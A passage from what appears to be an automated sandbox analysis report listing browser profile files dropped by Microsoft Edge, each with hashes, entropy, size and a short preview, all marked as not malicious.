MD5:	7E2BC5F4D02047B2613C8A854D26E8FA
SHA1:	B0A7CE43646CCD946DAFBF3D6890917F8A709BE3
SHA-256:	BF2F9236CE5A1101ADDF53BC3D52D2390A090BB4CE5B8CD5D269DC4DEDDC1ED6
SHA-512:	043DB20779E5E2D658483D3C6FA97911A1119E990B9433557EA3AD76FC5CF677A7FB2186578FB110C9A474BCBB5763D311CEAC7E9B81E06754E22DAB6BBA862B
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.175106307839866
Encrypted:	false
SSDEEP:	6:HUzLuty39+q2P923oH+Tcwt8aPrqIFUt8YUzLu7JZmw+YUzLue39VkwO923oH+Ts:+myN+v4YebL3FUt8Zi/+ZNV5LYebQJ
MD5:	F409F958864A765D38DB7DACFFAC71A1
SHA1:	290047AC4133BC1FE1056ECEF84A1A13BBB1CBEA
SHA-256:	A8323E7A956B4A662F0F0E1D3F0CFAB160B83C00F777E4ED4F37F10964141F32
SHA-512:	0DE3D633F3D411CE7013B69E5F6C3636744C453F36989197206FD65CCE070BDBCBC2A802AA66B68CFFB0DC9B8600FF97105AD44F2FADC63F2BBAB338B7AE34BC
Malicious:	false
Preview:	2024/11/11-04:33:15.185 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/11-04:33:15.186 1dbc Recovering log #3.2024/11/11-04:33:15.190 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.175106307839866
Encrypted:	false
SSDEEP:	6:HUzLuty39+q2P923oH+Tcwt8aPrqIFUt8YUzLu7JZmw+YUzLue39VkwO923oH+Ts:+myN+v4YebL3FUt8Zi/+ZNV5LYebQJ
MD5:	F409F958864A765D38DB7DACFFAC71A1
SHA1:	290047AC4133BC1FE1056ECEF84A1A13BBB1CBEA
SHA-256:	A8323E7A956B4A662F0F0E1D3F0CFAB160B83C00F777E4ED4F37F10964141F32
SHA-512:	0DE3D633F3D411CE7013B69E5F6C3636744C453F36989197206FD65CCE070BDBCBC2A802AA66B68CFFB0DC9B8600FF97105AD44F2FADC63F2BBAB338B7AE34BC
Malicious:	false
Preview:	2024/11/11-04:33:15.185 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/11-04:33:15.186 1dbc Recovering log #3.2024/11/11-04:33:15.190 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.160542461415677
Encrypted:	false
SSDEEP:	6:HUzLnj39+q2P923oH+Tcwt865IFUt8YUzLvMg3JZmw+YUzLv6N9VkwO923oH+Tc4:+jjN+v4Yeb/WFUt8ZrR/+ZrmV5LYeb/L
MD5:	946E876E131A36046DF92827FA17E5FB
SHA1:	3451D474A8D5C24C5C933106CEA4A513516C90B8
SHA-256:	B5982A500DB739874688AF58FD68D81D1B459970DD789F27B0883E138FC8BF37
SHA-512:	A10C68F696F30837A9931884C7C54C0C36549AE01B1509E63838FE1461FE6322A87380BD60A3198BA6C1077ADAF3B611FDE13E631F05B48DC5C5BE113E048FE5
Malicious:	false
Preview:	2024/11/11-04:33:15.204 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/11-04:33:15.280 1dbc Recovering log #3.2024/11/11-04:33:15.281 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.160542461415677
Encrypted:	false
SSDEEP:	6:HUzLnj39+q2P923oH+Tcwt865IFUt8YUzLvMg3JZmw+YUzLv6N9VkwO923oH+Tc4:+jjN+v4Yeb/WFUt8ZrR/+ZrmV5LYeb/L
MD5:	946E876E131A36046DF92827FA17E5FB
SHA1:	3451D474A8D5C24C5C933106CEA4A513516C90B8
SHA-256:	B5982A500DB739874688AF58FD68D81D1B459970DD789F27B0883E138FC8BF37
SHA-512:	A10C68F696F30837A9931884C7C54C0C36549AE01B1509E63838FE1461FE6322A87380BD60A3198BA6C1077ADAF3B611FDE13E631F05B48DC5C5BE113E048FE5
Malicious:	false
Preview:	2024/11/11-04:33:15.204 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/11-04:33:15.280 1dbc Recovering log #3.2024/11/11-04:33:15.281 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.120255135295513
Encrypted:	false
SSDEEP:	6:HUzLoYq2P923oH+Tcwt8NIFUt8YUzLopZmw+YUzLojkwO923oH+Tcwt8+eLJ:+EYv4YebpFUt8ZEp/+ZEj5LYebqJ
MD5:	1F327E62959C35CC2B72C2071A325308
SHA1:	3884ADD54F92B3BE461E5B345DF044475C67B663
SHA-256:	F4C7A30AEE2CF985AABC395F1EF70CCB8D5442DA885077F3F26601D817A9A868
SHA-512:	71EE7EE4AE6954E14A2D735679FB7A2C1C70AC7A09A2579D1BBD15C680FB890D30CECC85946D33C8D0984A93C2932E6BDA1C83D85299E85298637384E09BA780
Malicious:	false
Preview:	2024/11/11-04:33:15.700 460 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-04:33:15.700 460 Recovering log #3.2024/11/11-04:33:15.700 460 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.120255135295513
Encrypted:	false
SSDEEP:	6:HUzLoYq2P923oH+Tcwt8NIFUt8YUzLopZmw+YUzLojkwO923oH+Tcwt8+eLJ:+EYv4YebpFUt8ZEp/+ZEj5LYebqJ
MD5:	1F327E62959C35CC2B72C2071A325308
SHA1:	3884ADD54F92B3BE461E5B345DF044475C67B663
SHA-256:	F4C7A30AEE2CF985AABC395F1EF70CCB8D5442DA885077F3F26601D817A9A868
SHA-512:	71EE7EE4AE6954E14A2D735679FB7A2C1C70AC7A09A2579D1BBD15C680FB890D30CECC85946D33C8D0984A93C2932E6BDA1C83D85299E85298637384E09BA780
Malicious:	false
Preview:	2024/11/11-04:33:15.700 460 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/11-04:33:15.700 460 Recovering log #3.2024/11/11-04:33:15.700 460 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.2191763562065486
Encrypted:	false
SSDEEP:	3:StFlljq7A/mhWJFuQ3yy7IOWUhHglQdweytllrE9SFcTp4AGbNCV9RUIQgn:Z75fOb5d0Xi99pEY/
MD5:	EBBFCCA9FFA2026CBE9879BBE77E725C
SHA1:	31A950B1FC401DFE97E51D9E3305AC985652A7CB
SHA-256:	970CD70F2CBE59EC1D0D04AA666C058A7CB93A42C7666AC51FF49BD2C32A4CB3
SHA-512:	3A20241D09BD9889D61A666A8E7614D0148B6F31400121CEC6407E86E744BE3366E80D542C2AEA8627259EC11DDE7B9C7FCF5A55F187E16863993CF734ABA8ED
Malicious:	false
Preview:	.............."....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6477359148922557
Encrypted:	false
SSDEEP:	384:aj9P0+QkQerkgam6ISP/Kbtpjl4773pL9cqRKToaADhf:ad7e2biP/Il47sqRKc39
MD5:	818F61958245DB72DF7FCF9AB40CACD7
SHA1:	EB80D5DD9D91792CCA43FDE3016CD1A1BDB4B23F
SHA-256:	CC061356023378DDC5C0B71CF7C7638D8984C5E4E2B7AD2EDBFE7830E36D19B6
SHA-512:	143F84122377AD8277A1611C511CFA13102BF81D12A184BAB35554E1FB95CE69C0BE98478EC1C738E16E52340D653CDFDE273909E06BD42950364F46DAE6B13F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.261006767513773
Encrypted:	false
SSDEEP:	12:+Bv4Yeb8rcHEZrELFUt8ZXPZ/+ZXPz5LYeb8rcHEZrEZSJ:+t4Yeb8nZrExg8ZXP4XPlLYeb8nZrEZe
MD5:	C6FFCB3900300A98C3F2EB00860165FF
SHA1:	2ADCB6CE4F4E07F88CE5327CF74FDCB96FD5C6B3
SHA-256:	B073022A5428F055F105A71D5B46874B9074351035154690540FF951CD30F80D
SHA-512:	B2AD2DA6ABF76A1962FCEE785F59DDA55B90DC3C4102BF8C2B1EEFDC4DD86F6FFF5DD112A4006009BBFF5D6BBDCEDDFDE4A54E107FEE1CB275649716FC212961
Malicious:	false
Preview:	2024/11/11-04:33:18.732 460 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/11-04:33:18.733 460 Recovering log #3.2024/11/11-04:33:18.733 460 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.261006767513773
Encrypted:	false
SSDEEP:	12:+Bv4Yeb8rcHEZrELFUt8ZXPZ/+ZXPz5LYeb8rcHEZrEZSJ:+t4Yeb8nZrExg8ZXP4XPlLYeb8nZrEZe
MD5:	C6FFCB3900300A98C3F2EB00860165FF
SHA1:	2ADCB6CE4F4E07F88CE5327CF74FDCB96FD5C6B3
SHA-256:	B073022A5428F055F105A71D5B46874B9074351035154690540FF951CD30F80D
SHA-512:	B2AD2DA6ABF76A1962FCEE785F59DDA55B90DC3C4102BF8C2B1EEFDC4DD86F6FFF5DD112A4006009BBFF5D6BBDCEDDFDE4A54E107FEE1CB275649716FC212961
Malicious:	false
Preview:	2024/11/11-04:33:18.732 460 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/11-04:33:18.733 460 Recovering log #3.2024/11/11-04:33:18.733 460 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1599
Entropy (8bit):	5.60833130013419
Encrypted:	false
SSDEEP:	48:xZ/Wi2DzVybXZ3V03Sx4G/VQHHQX2bFy0uyG:xhSyDNPEjbET
MD5:	D97EED5E4B7B5C3D5BE0C75AB3FF0EE8
SHA1:	715C8315B777CBC98C22E63AD0906C58937C7E7D
SHA-256:	77BAA793EA013D8FB971AE7403C3E9EEBB49871EB5DDB0E28E827BE0CC314687
SHA-512:	A52054228FDAFEFECC95BFCAA92030827DA4265CAEEF193ACF3F16BD2AA3F6CBCFD2ED246E63C38F1B677F1E07ED74F3664195CE85ED819D42ED3079AD6EED83
Malicious:	false
Preview:	.^.58................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1021}.!_https://ntp.msn.com..LastKnownPV..1731317602171.-_https://ntp.msn.com..LastVisuallyReadyMarker..1731317603192.._https://ntp.msn.com..MUID!.18874E57A98C67C518B55B63A89566FE./_https://ntp.msn.com..NOTIFICATION_CACHE_LS_KEY...{"notificationLastRequestTimestamp":{"count":1731317605193,"notifications":0},"notificationBellCacheData":{"count":3,"notifications":[]}}.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1731317602253,"schedule":[24,36,-1,-1,9,-1,-1],"scheduleFixed":[24,36,-1,-1,9,-1,-1],"simpleSchedule":[16,23,31,52,36,17,24]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731317602126.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.172846816084469
Encrypted:	false
SSDEEP:	6:HUzLHr4q2P923oH+Tcwt8a2jMGIFUt8YUzLBJZmw+YUzLRD3DkwO923oH+Tcwt8N:+n4v4Yeb8EFUt8ZVJ/+ZFrD5LYeb8bJ
MD5:	416C11002F691B576A18507D48C4F597
SHA1:	D1B3C84AEFC4C03DD03E8591235C65E5C007A0B8
SHA-256:	C2387236B799DDD0E915B48270BF956EE55F31D0F1DED09979635C7C0375D0F8
SHA-512:	CC623E7FD74468575C658C772DD61B4FB5A07370984E7AB69A241AF8DBA8C6364B0896919CA692EF6F368B6F82189A21B6DB79979EF7012B0CDD9619175A221E
Malicious:	false
Preview:	2024/11/11-04:33:15.873 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-04:33:15.875 13b4 Recovering log #3.2024/11/11-04:33:15.879 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.172846816084469
Encrypted:	false
SSDEEP:	6:HUzLHr4q2P923oH+Tcwt8a2jMGIFUt8YUzLBJZmw+YUzLRD3DkwO923oH+Tcwt8N:+n4v4Yeb8EFUt8ZVJ/+ZFrD5LYeb8bJ
MD5:	416C11002F691B576A18507D48C4F597
SHA1:	D1B3C84AEFC4C03DD03E8591235C65E5C007A0B8
SHA-256:	C2387236B799DDD0E915B48270BF956EE55F31D0F1DED09979635C7C0375D0F8
SHA-512:	CC623E7FD74468575C658C772DD61B4FB5A07370984E7AB69A241AF8DBA8C6364B0896919CA692EF6F368B6F82189A21B6DB79979EF7012B0CDD9619175A221E
Malicious:	false
Preview:	2024/11/11-04:33:15.873 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/11-04:33:15.875 13b4 Recovering log #3.2024/11/11-04:33:15.879 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\46fa0235-ea06-437b-97f5-8d30b7331e0f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\74bab442-bff9-4f40-8e01-52d0d3a4b6a6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7653a162-6e50-4ab3-8f5c-f174d1923baf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\994cbbf4-787c-4d1b-9bc3-a936f6a2a5cc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
